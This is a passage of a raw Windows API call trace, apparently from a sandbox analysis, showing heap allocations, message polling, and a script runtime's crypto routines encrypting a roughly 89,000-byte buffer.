(HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.572] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.572] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0039.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.573] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.573] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.574] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.575] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.576] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.576] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.577] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.577] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.577] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.577] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.577] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.578] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0039.578] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.578] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.578] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.579] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.579] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.579] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.579] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.579] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.579] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.579] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.580] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x15c26, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x15c30) returned 1 [0039.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.580] CharLowerBuffW (in: lpsz="byte[89137]", cchLength=0xb | out: lpsz="byte[89137]") returned 0xb [0039.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.583] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.583] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.585] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x960868*, pdwDataLen=0x6ae220*=0x15c26, dwBufLen=0x15c30 | out: pbData=0x960868*, pdwDataLen=0x6ae220*=0x15c30) returned 1 [0039.585] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 